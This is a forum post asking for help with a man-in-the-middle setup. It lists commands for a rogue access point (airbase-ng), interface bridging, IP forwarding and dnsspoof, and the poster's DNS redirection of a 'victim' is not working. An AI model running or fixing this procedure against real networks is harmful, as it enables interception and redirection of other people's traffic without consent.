Hello ,
i am currently working on MITM attacks and i am trying to redirect websites to my computer through dnsspoof and the problem is that ,although it is picking up traffic and i can see it registers all sites the victim is visiting , it is still letting the victim connect to the website instead of redirecting it to me.
Here is a my procedure:
-firstly i created a mon0 interface form wlan0 wireless card
-i started up my access point [ airbase-ng --essid mitm -c 11 mon0 ]
-then i created a bridge between at0 and eth0 :
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
-then i went into [ ifconfig ] to see my ip ( lets say it is 150.150.1.1 ) and did :
ifconfig mitm-bridge 150.150.1.1 up
-so now my machine and the bridge have the same ip
-then i did ip forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
-i connected the victim to the airbase-ng and everything was fine .The traffic was going through and there was no problem.
-then i did:
dnsspoof -i mitm-bridge
-it started and when i went to google.com on the victim machine it didnt reroute it.It just went to google.com
-when it connected to google.com it showed :
192.168.1.13 .<some random 5 digit number> > 192.186.1.1.53 A? google.com
-from where i was getting my information about dnsspoof it showed that instead of the 192.168.1.13 ( the ip of the victim device ) should be 150.150.1.1 ( attacking device ) and it was stated that the connection would be refused but it wasnt!
Please help me!
I am trying to figure this out for a week now...
Good day!